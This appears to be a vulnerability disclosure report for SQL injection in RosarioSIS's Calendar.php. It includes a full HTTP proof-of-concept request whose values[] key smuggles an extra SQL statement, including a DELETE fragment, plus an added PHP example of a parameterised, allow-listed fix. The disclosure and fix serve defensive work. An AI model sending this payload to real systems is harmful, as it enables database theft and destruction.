SQL injection in Calendar.php in francoisjacquet/rosariosis
Valid
Reported on Apr 25th 2022
Description
In Calendar.php, lines 498-513, the web server takes the `values` request parameter and uses it as part of a SQL query without sanitizing it, so an attacker can manipulate the SQL query that the web server executes: https://github.com/francoisjacquet/rosariosis/blob/51947b6cfc7f0df62ab3305839c89586004fbec2/modules/School_Setup/Calendar.php#L498
Proof of Concept
POST /demonstration/Modules.php?modname=School_Setup/Calendar.php&modfunc=detail&event_id=new&month=04&year=2022 HTTP/1.1
Host: www.rosariosis.org
Cookie: RosarioSIS=ls2p6bohdqumdr8oecokk4j3bp8e79vs3mrhkgn37905r7i2phi0
Content-Length: 205
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://www.rosariosis.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.rosariosis.org/demonstration/Modules.php?modname=School_Setup/Calendar.php&modfunc=detail&year=2022&month=04&school_date=2022-04-04&event_id=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8,no;q=0.7
Connection: close
month_values[SCHOOL_DATE]=04&day_values[SCHOOL_DATE]=04&year_values[SCHOOL_DATE]=202'2&REPEAT=1&values[DESCRIPTION) values (23,"2021","1",NULL);DELETE *FROM ;--][TITLE]=123&values[DESCRIPTION]=&button=Save
Impact
An attacker can modify the query and get all the data in the database.
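As an added example (not RosarioSIS code) of how a handler receiving the request shape shown in the PoC can build the same INSERT safely: the date parts are validated before use, the keys of `values[...]` are checked against an allow-list of column names instead of being interpolated into the SQL text, and every value is bound as a PDO parameter. The table name `calendar_events`, the column list and the PDO wiring are assumptions for illustration.

```php
<?php
// Added example, not RosarioSIS code. Builds the INSERT for a new calendar
// event from the request shape in the PoC (values[...], month_values,
// day_values, year_values). Table and column names are assumptions.

const EVENT_COLUMNS = ['TITLE', 'DESCRIPTION'];

// One date part: digits only, bounded length, or null. A value such as
// "202'2" is rejected here instead of reaching the database.
function datePart(array $parts, int $maxLen): ?int
{
    $s = (string) ($parts['SCHOOL_DATE'] ?? '');
    return (ctype_digit($s) && strlen($s) <= $maxLen) ? (int) $s : null;
}

// Returns YYYY-MM-DD built from the three request arrays, or null if invalid.
function schoolDateFromRequest(array $year, array $month, array $day): ?string
{
    $y = datePart($year, 4);
    $m = datePart($month, 2);
    $d = datePart($day, 2);
    if ($y === null || $m === null || $d === null || !checkdate($m, $d, $y)) {
        return null;
    }
    return sprintf('%04d-%02d-%02d', $y, $m, $d);
}

// Returns [$sql, $params]. Column names come only from the allow-list; every
// client-supplied value is bound as a parameter, never concatenated into SQL.
function buildEventInsert(array $values, int $schoolId, string $schoolDate): array
{
    $columns = ['SCHOOL_ID', 'SCHOOL_DATE'];
    $params  = [':school_id' => $schoolId, ':school_date' => $schoolDate];
    foreach ($values as $column => $value) {
        // Array keys are client-controlled too: reject unknown columns.
        if (!in_array($column, EVENT_COLUMNS, true)) {
            throw new InvalidArgumentException('Unexpected column: ' . $column);
        }
        $columns[] = $column;
        $params[':' . strtolower($column)] = (string) $value;
    }
    $sql = sprintf('INSERT INTO calendar_events (%s) VALUES (%s)',
        implode(', ', $columns), implode(', ', array_keys($params)));
    return [$sql, $params];
}

// Usage with an existing PDO connection $pdo (placeholder):
// $date = schoolDateFromRequest($_POST['year_values'] ?? [], $_POST['month_values'] ?? [], $_POST['day_values'] ?? []);
// if ($date === null) { http_response_code(400); exit; }
// [$sql, $params] = buildEventInsert($_POST['values'] ?? [], 1, $date);
// $pdo->prepare($sql)->execute($params);
```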
We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. (a year ago)
We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back. (a year ago)